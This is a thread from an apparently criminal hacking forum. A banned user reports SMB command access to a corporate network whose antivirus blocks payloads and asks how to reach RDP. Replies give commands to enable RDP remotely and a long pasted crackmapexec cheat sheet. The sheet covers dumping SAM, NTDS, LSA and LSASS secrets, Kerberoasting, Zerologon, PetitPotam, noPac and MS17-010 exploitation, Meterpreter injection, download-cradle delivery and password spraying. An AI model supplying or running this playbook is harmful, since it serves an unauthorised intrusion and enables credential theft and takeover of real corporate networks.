• XSS.stack #1 – первый литературный журнал от юзеров форума

SMB Access

Отслеживать
SlowMan

SlowMan

(L3) cache
Забанен
Регистрация
22.07.2023
Сообщения
167
Реакции
6
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет.
Есть доступ к корпе по SMB
Могу получить доступ к кмд через smbexec
Все остальные порты внешне закрыты. На таргете авер стоит и блочит если грузить нагрузку
Что делать? Как быть? Как получить доступ к RDP?
 
1) nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable
2) nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable-ram
 
copy and save for future :D


Код: 
nmap -Pn -sC -sV -oA all_tcp -T4 --min-rate=1000 -vvvvvvv --reason -p- --script vuln  TARGET_HOST
sudo nmap -Pn -A -sS -sC -sV -O  --script vuln TARGET_HOST
nmap –script vuln  -p 445 TARGET_HOST
nmap -Pn -p- -sS -sV -sC -v TARGET_HOST
nmap -n -Pn -sV -p 445 --script smb-vuln-ms17-010 TARGET_HOST
nmap -n -Pn -sV -p 445 --script smb-vuln-ms08-067 TARGET_HOST
nmap -n -Pn -sV -p 445 --script smb-vuln-ms10-054 TARGET_HOST
nmap -n -Pn -sV -p 445 --script smb-vuln-ms10-061 TARGET_HOST

nmap -n -Pn -sV  --script vuln  -p 445 TARGET_HOST
nmap -n -Pn -sV -p 445 --script smb-vuln* TARGET_HOST


nmap -n -Pn -sV -p 445 --script smb-vuln* TARGET_HOST
nmap -Pn -A -sC -sV  --script vuln TARGET_HOST
#######################################################################################################################################
To change a user credential
ex: smbpasswd -r TARGET_HOST -U peter
#######################################################################################################################################

nmap -n -Pn -sV -p 445 --script smb-vuln-ms17-010

crackmapexec smb TARGET_HOST -u users.txt -p pwd123! --continue-on-success


crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -x 'dir c:\'


#######################################################################################################################################
##### SMB
poetry run crackmapexec smb TARGET_HOST/24 -u "" up ""
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010

crackmapexec smb TARGET_HOST -u "" up ""
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --pass-pol
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --disks
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --groups
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sessions
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --loggedon-users
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --users
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --computers
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --rid-brute
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-groups
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --gen-relay-list /tmp/relaylistOutputFilename.txt
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --local-auth
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --sam


crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --ntds
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --ntds vss


crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --lsa
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --dpapi
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -x whoami
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --wmi "select Name from win32_computersystem"

crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable-ram

crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable-ram


crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=wmi ACTION=enable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=wmi ACTION=enable-ram






##### SMB Modules
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M bh_owned
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M drop-sc -o CLEANUP=True
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec -o LISTENER=http-listener OBFUSCATE=True
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_av
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_dns -o DOMAIN=google.com
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M firefox
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get_netconnections
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_password
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M handlekatz -o HANDLEKATZ_EXE_NAME="hk.exe"
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M hash_spider
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M impersonate
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M install_elevated
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver


# currently hanging indefinitely - TODO: look into this
#crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_discover
#crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger -o ACTION=ALL USER=USERNAME KEEPASS_CONFIG_PATH="C:\\Users\\USERNAME\\AppData\\Roaming\\KeePass\\KeePass.config.xml"
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M lsassy



# You must replace this with the proper CA information!
#crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M masky -o CA="host.domain.tld\domain-host-CA"
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M msol
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nopac
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntdsutil
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntlmv1
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M petitpotam
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M procdump
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdcman
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion KEY=DevicePath
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M runasppl
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy -o NAME=test CLEANUP=True
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o SERVER=127.0.0.1 NAME=test
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky -o NAME=test CLEANUP=True
# spider_plus takes a while to run, so it is commented out during normal testing
# crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spider_plus -o MAX_FILE_SIZE=100
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M teams_localdb
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M uac
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M veeam
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=enable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wdigest -o ACTION=disable
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M webdav -o MSG="Message: {}"
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wifi
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M winscp
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M zerologon


crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler -M petitpotam -M zerologon -M nopac -M dfscoerce -M enum_av -M enum_dns -M gpp_autologin -M gpp_password -M lsassy -M impersonate -M install_elevated -M ioxidresolver -M ms17-010 -M ntlmv1 -M runasppl -M shadowcoerce -M uac -M webdav -M wifi


crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M bh_owned --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M dfscoerce --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M empire_exec --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M enum_av --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M firefox --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get_netconnections --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M gpp_password --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M hash_spider --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M impersonate --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M install_elevated --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_discover --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M lsassy --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M masky --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ms17-010 --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M msol --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nopac --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntdsutil --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ntlmv1 --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M petitpotam --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M procdump --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdcman --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M reg-query --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M runasppl --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M scuffy --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M slinky --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spider_plus --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M spooler --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M teams_localdb --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M uac --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M veeam --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M wifi --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M winscp --options
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M zerologon --options



##### SMB Anonymous Auth
crackmapexec smb TARGET_HOST -u '' -p '' -M zerologon
crackmapexec smb TARGET_HOST -u '' -p '' -M petitpotam


##### SMB Auth File
crackmapexec smb TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce
crackmapexec smb TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success
crackmapexec smb TARGET_HOST -u data/test_users.txt -p test_passwords.txt



##### LDAP
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --users
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --groups
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --get-sid
crackmapexec ldap TARGET_HOST -u USERNAME -p '' --asreproast /tmp/output.txt
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/output2.txt
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --admin-count
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --gmsa



##### LDAP Modules
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M adcs
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M adcs --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M daclread -o TARGET=USERNAME ACTION=read
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M daclread --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-desc-users
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-desc-users --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-network
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M get-network --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M groupmembership --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M groupmembership -o USER=USERNAME
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M laps
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M laps --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ldap-checker
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M ldap-checker --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M maq
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M maq --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M subnets
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M subnets --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M user-desc
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M whoami
crackmapexec ldap TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M whoami --options

##### WINRM
crackmapexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex
crackmapexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -X whoami
crackmapexec winrm TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --laps

##### MSSQL
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS

##### MSSQL Modules
# crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD -M empire_exec
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -L
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
crackmapexec mssql TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle


##### RDP
crackmapexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to regex
crackmapexec rdp TARGET_HOST -u USERNAME -p PASSWORD KERBEROS --nla-screenshot
# a bit janky, but we try to enable RDP before testing RDP
crackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable



##### SSH - Default test passwords and random key; switch these out if you want correct authentication
crackmapexec ssh TARGET_HOST -u USERNAME -p PASSWORD
crackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce
crackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success
crackmapexec ssh TARGET_HOST -u data/test_users.txt -p test_passwords.txt
crackmapexec ssh TARGET_HOST -u USERNAME -p PASSWORD --key-file data/test_key.priv
crackmapexec ssh TARGET_HOST -u USERNAME -p '' --key-file data/test_key.priv


##### FTP- Default test passwords and random key; switch these out if you want correct authentication
crackmapexec ftp TARGET_HOST -u USERNAME -p PASSWORD
crackmapexec ftp TARGET_HOST -u USERNAME -p PASSWORD --ls
crackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce
crackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt --no-bruteforce --continue-on-success
crackmapexec ftp TARGET_HOST -u data/test_users.txt -p test_passwords.txt
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх